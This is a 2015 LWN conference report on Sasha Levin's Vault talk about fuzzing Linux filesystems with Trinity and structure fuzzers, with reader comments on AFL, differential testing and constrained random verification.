Filesystem fuzzing

By Jake Edge
March 18, 2015

Vault 2015

At the inaugural Vault conference, Sasha Levin gave a presentation on filesystem fuzzing—deliberately providing random bad input to the kernel to try to find bugs. He described different kinds of fuzzing, along with giving examples of some security bugs that were found. The conference itself focused on Linux storage and filesystems and was held March 11-12 in Boston. It attracted around 400 attendees, which has led the Linux Foundation to schedule another Vault for next year in Raleigh, North Carolina.

Levin started by saying that Linux has a problem with "shitty code". That's not because the developers are not skilled, nor is it that code review is going by the wayside. The biggest problem is that the code does not get all that much testing until after it is merged into the mainline. At that point, users get their hands on it and start to find bugs.

Kernel testing

Testing the kernel is done by multiple groups in the ecosystem. Developers will run some tests against their code; for filesystems those tests might include xfstests. Quality assurance (QA) groups will also run tests, but those are typically limited to existing test suites with a known set of tests. The kernel is a "big, scary machine", he said, and it needs more testing.

There are two different kinds of testing: manual and automated. Manual tests are typically run by developers based on the code they changed. If a developer changes the open() call, for example, they "poke it a little bit" to see if anything is broken. That kind of testing is slow and requires a human to create, run, and interpret the tests. It doesn't really scale so that multiple testers could get involved, either.

Automated tests essentially perform the manual tests automatically. Once a test suite covers the basics, though, people stop adding tests except to check for regressions. There is not much done with these test suites (such as the Linux Test Project, xfstests, Filebench, IOzone, and others) to find new bugs. In addition, there is no real effort to test new features.

Users test the code by doing their normal work. They may have a technical background, but they did not review the patches and are not working on the filesystem. They are just trying to get their work done and have not set out to test anything.

There are some things missing from today's testing. Test developers don't try to guess what users will or won't do so that tests cover the corner cases. Test suites generally just check for regressions. In addition, there is little imagination that goes into test development, since creating new features is much more interesting to developers than creating new tests.

For example, he mentioned the __GFP_NOFAIL issues that have been discussed in kernel forums (including the Linux Storage, Filesystem, and Memory Management (LSFMM) Summit) recently. Dave Chinner added tests to xfstests to observe that problem, but only after the problems had been hit. That means that someone ran into those problems and ended up with a corrupted filesystem. It would be nice to find those kinds of problems before someone hits them and ends up complaining about a "shitty kernel", he said.

Fuzzing

Fuzzing is a technique that effectively creates new tests on the fly. Some of those tests are stupid, but others may find bugs. In addition, fuzzing frameworks tend to be heavily threaded which puts a different kind of load on filesystems. The existing test suites do put a load on the filesystem, but it is basically the same load over and over again. So fuzzing can help test concurrency in the filesystem as well.

"Structure fuzzing" simply takes a filesystem image, makes some changes to it, and then tries to mount it. Some of those tests have found kernel crashes or panics at mount time. But not every corruption can or will be found at mount time because that is too expensive to check. Testing with other operations will show whether the corruption is handled appropriately post-mount.

But just flipping every bit in the filesystem image doesn't really make too much sense as a test. That's where "smart structure fuzzing" comes into play. This kind of testing is filesystem-specific as it must have some knowledge of the structure of the filesystem. Since that structure can't really change often (it resides on-disk), this kind of testing does not need to be done all of the time. It can be run occasionally, especially when there are changes that might affect the binary format.

"API fuzzing" is more popular, Levin said. It typically fuzzes the virtual filesystem (VFS) layer, so it is not necessarily filesystem-specific. Basically, API fuzzing tries passing lots of different values to the system calls to see if it can break something.

"Smart API fuzzing" takes that one step further by incorporating knowledge about the kinds of values that make sense as parameters to the system calls. For example, chmod() takes a path and a mode. The first check in chmod() is to see if the mode value is reasonable, so sending all of the 2¹⁶ possibilities doesn't make sense all of the time. Doing that occasionally is useful, but it is overkill to test the same error path over and over.

As an example of what this kind of fuzzing can find, Levin pointed to CVE-2015-1420. It is an invalid memory access in open_by_handle_at() that was found because the fuzzer knew what the function expects. In a multithreaded test, it was able to change the size in a structure between the time it was used for allocating a buffer and the time it was used to actually read the data. Since the fuzzer had knowledge of the parameters and their types, it could change them in multiple threads.

Having many threads all accessing the filesystem is a place where fuzzers shine. For example, simulating 10,000 users is easy, which can help catch untested scenarios, he said. It makes it easier to catch problems where a lot of load is needed to hit them.

CVE-2014-4171 was an example of a bug that needed a high load to find. It is a local denial of service that can happen when accessing the region around a hole in a file using mmap() while that hole is being punched in another thread. It was easy to see in the code once it was discovered, but it was only found under heavy load from the fuzzer.

That is one of the benefits of fuzzing, he said, that it creates tests that no filesystem developer would ever think of. It will do things that are not reasonable and don't make any sense. For example, CVE-2014-8086 is a race condition that was discovered when switching between asynchronous I/O and direct I/O, which is something that "no one really does". But a malicious user can, of course.

It is nice to know that some set of tests cover most or all of the lines of code of interest, but it does not mean that the code is right. There are multiple paths through any code, so it is important to have lots of threads exercising different paths from different places. Executing rarely used paths is useful as well.

Disadvantages

There are some disadvantages to fuzzing, though. For one thing, there is no pass/fail criteria. Since it is random, you can't say that if it runs for an hour it is considered a "pass". It may miss completely obvious errors. As Peter Zijlstra put it, running for some length of time "doesn't mean that the behavior is right, just that it didn't explode". There may be plenty of bugs lurking that just don't cause a big enough problem to crash the test (or the kernel).

Fuzzing really needs to run continuously, Levin said. It can't just be run overnight and checked in the morning. Instead it should be run continuously and checked daily. Fuzzing is a resource hog too, but that actually helps testing the memory management code, especially for huge pages. The tests split lots of pages and make it hard to collapse them back into huge pages, he said.

Reproducing bugs found by the fuzzer can be quite difficult. Unfortunately, the right answer for causing the bug to happen again is often "run the fuzzer and wish for the best". It is difficult to output the results of tests because the amount of data slows the system down. Things like the last system call made aren't all that helpful, he said. Intel's Processor Trace (which Levin learned about at LSFMM) may help the situation eventually.

Levin suggested that the community should be doing more fuzzing. Developers should be doing some fuzzing before they send in patches and QA folks should be fuzzing continuously. A QA person in the audience asked about getting more information out of the kernel when it fails from fuzzing. Levin suggested setting up the kernel to do a memory dump when it gets a BUG_ON(). He will also be working on better BUG_ON() reporting.

He uses the Trinity fuzz tester for all of the API fuzzing and a different, unnamed tool for filesystem structure fuzzing. He runs Trinity in a virtual machine, while Trinity developer Dave Jones runs it on real hardware, so they find different kinds of bugs. Levin has not gotten to the point where he can run Trinity on linux-next for a week without hitting problems; so far he has not needed to look anywhere else for fuzzing tests.

[I would like to thank the Linux Foundation for travel support to Boston for Vault.]

Index entries for this article
Kernel	Filesystems/Fuzzing
Security	Fuzzing
Security	Linux kernel/Tools
Conference	Vault/2015

Filesystem fuzzing

Posted Mar 19, 2015 2:44 UTC (Thu) by josh (subscriber, #17465) [Link] (1 responses)

It'd be interesting to apply some of the techniques from afl (http://lcamtuf.coredump.cx/afl/) to the kernel and trinity: have the fuzzer actively seek out inputs that trigger different code paths in the kernel.

Filesystem fuzzing

Posted Mar 26, 2015 7:58 UTC (Thu) by chojrak11 (guest, #52056) [Link]

AFL has already found so many bugs and security vulnerabilities. The fact that it's ignored by kernel developers is amazing. I dare to say that it's the best fuzzer available. And it's completely free.

Filesystem fuzzing

Posted Mar 19, 2015 6:01 UTC (Thu) by eru (subscriber, #2753) [Link] (2 responses)

For one thing, there is no pass/fail criteria.

I once tested some aspects of a C compiler being developed by a kind of fuzzer that produced semi-randomly valid program snippets that were then compiled and run both by the tested compiler and a reference compiler, and the outputs compared. Differences (or a crash) indicated there was something requiring a closer look. Unfortunately some differences were benign, resulting from different expression evaluation order, but it did help find many problems.

I wonder if some of the file system fuzzing could employ the same idea, by doing identical operations to two different file systems and comparing the effect.

Filesystem fuzzing

Posted Mar 19, 2015 9:11 UTC (Thu) by roc (subscriber, #30627) [Link]

Mozilla's JS engine team do something similar and find tons of bugs.

Filesystem fuzzing

Posted Mar 20, 2015 10:00 UTC (Fri) by hkario (subscriber, #94864) [Link]

problem is that many file systems have explicitly different behaviour between them

Filesystem fuzzing

Posted Mar 21, 2015 15:28 UTC (Sat) by cajal (guest, #4167) [Link]

This reminds of the IRON file systems work done at U. Wisconsin a few years back. A research group there did fault injection testing between the block layer and the filesystem layer. They found several bugs in ext3, reiser3, and JFS.

http://research.cs.wisc.edu/wind/Publications/sfa-dsn05.pdf

Presentation on their work:
https://www.youtube.com/watch?v=zAhqjeHV71Q

Glad to see folks picking up these ideas.

Filesystem fuzzing

Posted Mar 26, 2015 16:45 UTC (Thu) by jgg (subscriber, #55211) [Link]

In hardware circles this kind of testing is called 'constrained random verification', it is very effective and fairly easy to deploy. Coupled with good code coverage metrics you can quickly get some idea on what code paths need special attention. It is amazing the corner cases these tools can find.

On the down side, the hardware projects I've done lately end up with a 50/50 split of actual device code vs test code, and the key thing that makes this testing possible is writing every algorithm twice. Once in a very high level inefficient way, and then a second time in the highly optimized parallel version needed for hardware. The testing focuses on ensuring the two behave the same.

The other down side is the tooling to do this costs about 50k$ per user :(

I've always wanted a similar constraints language for normal software.. Like specify a regex pattern for a string and the constraints solver produces random strings that conform to that pattern. Or a tool that can take an ANTLR description and produce random valid strings.

I continue to be amazed when people dismiss the need for static analysis (eg type checking, etc) on the basis you need to test anyhow, but then use languages have really basic test capabilities and almost no coverage capability. So people write little hand coded tests and feel good about things with no idea how the tests are actually performing.